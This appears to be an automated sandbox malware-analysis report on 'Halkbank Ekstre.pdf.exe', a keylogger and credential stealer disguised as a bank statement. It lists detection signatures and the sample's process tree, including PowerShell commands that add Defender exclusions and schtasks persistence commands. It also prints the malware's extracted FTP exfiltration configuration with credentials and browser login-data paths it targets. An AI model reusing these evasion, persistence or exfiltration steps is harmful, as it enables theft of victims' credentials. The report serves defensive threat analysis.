Edit tour

Windows Analysis Report
Halkbank Ekstre.pdf.exe

Overview

General Information

Sample name:	Halkbank Ekstre.pdf.exe
Analysis ID:	1596082
MD5:	843f8757da04e0c033d219e17ca2109d
SHA1:	9931f04fba177026099278dc26464d4208ac4d59
SHA256:	1fa03ffa990685dcc676b8706fd5ef7246de2c18b97c14d882ee25b0d130955e
Tags:	exegeoHalkbankTURuser-abuse_ch
Infos:

Detection

ReverseShell, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Sigma detected: Suspicious Double Extension File Execution

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected ReverseShell

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to many ports of the same IP (likely port scanning)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Halkbank Ekstre.pdf.exe (PID: 1956 cmdline: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe" MD5: 843F8757DA04E0C033D219E17CA2109D)

powershell.exe (PID: 1244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2836 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 1544 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Halkbank Ekstre.pdf.exe (PID: 2192 cmdline: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe" MD5: 843F8757DA04E0C033D219E17CA2109D)

uAHDaCgpWpsogA.exe (PID: 2876 cmdline: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe MD5: 843F8757DA04E0C033D219E17CA2109D)

schtasks.exe (PID: 1824 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

uAHDaCgpWpsogA.exe (PID: 1080 cmdline: "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe" MD5: 843F8757DA04E0C033D219E17CA2109D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "FTP", "Username": "anonymous_log@kashmirestore.com", "Password": "c%P+6,(]YFvP", "FTP Server": "ftp://kashmirestore.com/"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2615770776.00000000034C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.2615770776.0000000003478000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_ReverseShell	Yara detected ReverseShell	Joe Security
00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xddf:$a1: get_encryptedPassword 0x10fc:$a2: get_encryptedUsername 0xbef:$a3: get_timePasswordChanged 0xcf8:$a4: get_passwordField 0xdf5:$a5: set_encryptedPassword 0x24ce:$a7: get_logins 0x2431:$a10: KeyLoggerEventArgs 0x2096:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ReverseShell	Yara detected ReverseShell	Joe Security
00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x373e77:$a1: get_encryptedPassword 0x3b7a97:$a1: get_encryptedPassword 0x3fb4b7:$a1: get_encryptedPassword 0x374194:$a2: get_encryptedUsername 0x3b7db4:$a2: get_encryptedUsername 0x3fb7d4:$a2: get_encryptedUsername 0x373c87:$a3: get_timePasswordChanged 0x3b78a7:$a3: get_timePasswordChanged 0x3fb2c7:$a3: get_timePasswordChanged 0x373d90:$a4: get_passwordField 0x3b79b0:$a4: get_passwordField 0x3fb3d0:$a4: get_passwordField 0x373e8d:$a5: set_encryptedPassword 0x3b7aad:$a5: set_encryptedPassword 0x3fb4cd:$a5: set_encryptedPassword 0x375566:$a7: get_logins 0x3b9186:$a7: get_logins 0x3fcba6:$a7: get_logins 0x3754c9:$a10: KeyLoggerEventArgs 0x3b90e9:$a10: KeyLoggerEventArgs 0x3fcb09:$a10: KeyLoggerEventArgs
00000011.00000002.2615043055.0000000003327000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2615043055.0000000003327000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956	JoeSecurity_ReverseShell	Yara detected ReverseShell	Joe Security
Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x806bc:$a1: get_encryptedPassword 0x808ea:$a2: get_encryptedUsername 0x804e9:$a3: get_timePasswordChanged 0x805e6:$a4: get_passwordField 0x806d2:$a5: set_encryptedPassword 0x8260c:$a7: get_logins 0x82584:$a10: KeyLoggerEventArgs 0x8231a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192	JoeSecurity_ReverseShell	Yara detected ReverseShell	Joe Security
Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1682e1:$a1: get_encryptedPassword 0x1685f4:$a2: get_encryptedUsername 0x1680fb:$a3: get_timePasswordChanged 0x168204:$a4: get_passwordField 0x1682f7:$a5: set_encryptedPassword 0x16a7a3:$a7: get_logins 0x16a706:$a10: KeyLoggerEventArgs 0x16a36f:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: uAHDaCgpWpsogA.exe PID: 2876	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: uAHDaCgpWpsogA.exe PID: 1080	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: uAHDaCgpWpsogA.exe PID: 1080	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack	JoeSecurity_ReverseShell	Yara detected ReverseShell	Joe Security
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c1df:$a1: get_encryptedPassword 0x2c4fc:$a2: get_encryptedUsername 0x2bfef:$a3: get_timePasswordChanged 0x2c0f8:$a4: get_passwordField 0x2c1f5:$a5: set_encryptedPassword 0x2d8ce:$a7: get_logins 0x2d831:$a10: KeyLoggerEventArgs 0x2d496:$a11: KeyLoggerEventArgsEventHandler
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39fe6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39689:$a3: \Google\Chrome\User Data\Default\Login Data 0x398e6:$a4: \Orbitum\User Data\Default\Login Data 0x3a2c5:$a5: \Kometa\User Data\Default\Login Data
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ce00:$s1: UnHook 0x2ce07:$s2: SetHook 0x2ce0f:$s3: CallNextHook 0x2ce1c:$s4: _hook
9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack	JoeSecurity_ReverseShell	Yara detected ReverseShell	Joe Security
9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dfdf:$a1: get_encryptedPassword 0x2e2fc:$a2: get_encryptedUsername 0x2ddef:$a3: get_timePasswordChanged 0x2def8:$a4: get_passwordField 0x2dff5:$a5: set_encryptedPassword 0x2f6ce:$a7: get_logins 0x2f631:$a10: KeyLoggerEventArgs 0x2f296:$a11: KeyLoggerEventArgsEventHandler
9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bde6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b489:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b6e6:$a4: \Orbitum\User Data\Default\Login Data 0x3c0c5:$a5: \Kometa\User Data\Default\Login Data
9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec00:$s1: UnHook 0x2ec07:$s2: SetHook 0x2ec0f:$s3: CallNextHook 0x2ec1c:$s4: _hook
0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack	JoeSecurity_ReverseShell	Yara detected ReverseShell	Joe Security
0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb5fff:$a1: get_encryptedPassword 0xf9c1f:$a1: get_encryptedPassword 0x13d63f:$a1: get_encryptedPassword 0xb631c:$a2: get_encryptedUsername 0xf9f3c:$a2: get_encryptedUsername 0x13d95c:$a2: get_encryptedUsername 0xb5e0f:$a3: get_timePasswordChanged 0xf9a2f:$a3: get_timePasswordChanged 0x13d44f:$a3: get_timePasswordChanged 0xb5f18:$a4: get_passwordField 0xf9b38:$a4: get_passwordField 0x13d558:$a4: get_passwordField 0xb6015:$a5: set_encryptedPassword 0xf9c35:$a5: set_encryptedPassword 0x13d655:$a5: set_encryptedPassword 0xb76ee:$a7: get_logins 0xfb30e:$a7: get_logins 0x13ed2e:$a7: get_logins 0xb7651:$a10: KeyLoggerEventArgs 0xfb271:$a10: KeyLoggerEventArgs 0x13ec91:$a10: KeyLoggerEventArgs
0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb6c20:$s1: UnHook 0xfa840:$s1: UnHook 0x13e260:$s1: UnHook 0xb6c27:$s2: SetHook 0xfa847:$s2: SetHook 0x13e267:$s2: SetHook 0xb6c2f:$s3: CallNextHook 0xfa84f:$s3: CallNextHook 0x13e26f:$s3: CallNextHook 0xb6c3c:$s4: _hook 0xfa85c:$s4: _hook 0x13e27c:$s4: _hook
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack	JoeSecurity_ReverseShell	Yara detected ReverseShell	Joe Security
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dfdf:$a1: get_encryptedPassword 0x71bff:$a1: get_encryptedPassword 0xb561f:$a1: get_encryptedPassword 0x2e2fc:$a2: get_encryptedUsername 0x71f1c:$a2: get_encryptedUsername 0xb593c:$a2: get_encryptedUsername 0x2ddef:$a3: get_timePasswordChanged 0x71a0f:$a3: get_timePasswordChanged 0xb542f:$a3: get_timePasswordChanged 0x2def8:$a4: get_passwordField 0x71b18:$a4: get_passwordField 0xb5538:$a4: get_passwordField 0x2dff5:$a5: set_encryptedPassword 0x71c15:$a5: set_encryptedPassword 0xb5635:$a5: set_encryptedPassword 0x2f6ce:$a7: get_logins 0x732ee:$a7: get_logins 0xb6d0e:$a7: get_logins 0x2f631:$a10: KeyLoggerEventArgs 0x73251:$a10: KeyLoggerEventArgs 0xb6c71:$a10: KeyLoggerEventArgs
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bde6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fa06:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc3426:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b489:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f0a9:$a3: \Google\Chrome\User Data\Default\Login Data 0xc2ac9:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b6e6:$a4: \Orbitum\User Data\Default\Login Data 0x7f306:$a4: \Orbitum\User Data\Default\Login Data 0xc2d26:$a4: \Orbitum\User Data\Default\Login Data 0x3c0c5:$a5: \Kometa\User Data\Default\Login Data 0x7fce5:$a5: \Kometa\User Data\Default\Login Data 0xc3705:$a5: \Kometa\User Data\Default\Login Data
0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec00:$s1: UnHook 0x72820:$s1: UnHook 0xb6240:$s1: UnHook 0x2ec07:$s2: SetHook 0x72827:$s2: SetHook 0xb6247:$s2: SetHook 0x2ec0f:$s3: CallNextHook 0x7282f:$s3: CallNextHook 0xb624f:$s3: CallNextHook 0x2ec1c:$s4: _hook 0x7283c:$s4: _hook 0xb625c:$s4: _hook
0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack	JoeSecurity_ReverseShell	Yara detected ReverseShell	Joe Security
0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13e01f:$a1: get_encryptedPassword 0x181c3f:$a1: get_encryptedPassword 0x1c565f:$a1: get_encryptedPassword 0x13e33c:$a2: get_encryptedUsername 0x181f5c:$a2: get_encryptedUsername 0x1c597c:$a2: get_encryptedUsername 0x13de2f:$a3: get_timePasswordChanged 0x181a4f:$a3: get_timePasswordChanged 0x1c546f:$a3: get_timePasswordChanged 0x13df38:$a4: get_passwordField 0x181b58:$a4: get_passwordField 0x1c5578:$a4: get_passwordField 0x13e035:$a5: set_encryptedPassword 0x181c55:$a5: set_encryptedPassword 0x1c5675:$a5: set_encryptedPassword 0x13f70e:$a7: get_logins 0x18332e:$a7: get_logins 0x1c6d4e:$a7: get_logins 0x13f671:$a10: KeyLoggerEventArgs 0x183291:$a10: KeyLoggerEventArgs 0x1c6cb1:$a10: KeyLoggerEventArgs
0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13ec40:$s1: UnHook 0x182860:$s1: UnHook 0x1c6280:$s1: UnHook 0x13ec47:$s2: SetHook 0x182867:$s2: SetHook 0x1c6287:$s2: SetHook 0x13ec4f:$s3: CallNextHook 0x18286f:$s3: CallNextHook 0x1c628f:$s3: CallNextHook 0x13ec5c:$s4: _hook 0x18287c:$s4: _hook 0x1c629c:$s4: _hook
Click to see the 31 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, NewProcessName: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ProcessId: 1956, ProcessName: Halkbank Ekstre.pdf.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ParentImage: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, ParentProcessId: 1956, ParentProcessName: Halkbank Ekstre.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ProcessId: 1244, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe, ParentImage: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe, ParentProcessId: 2876, ParentProcessName: uAHDaCgpWpsogA.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp", ProcessId: 1824, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ParentImage: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, ParentProcessId: 1956, ParentProcessName: Halkbank Ekstre.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp", ProcessId: 1544, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ParentImage: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, ParentProcessId: 1956, ParentProcessName: Halkbank Ekstre.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ProcessId: 1244, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

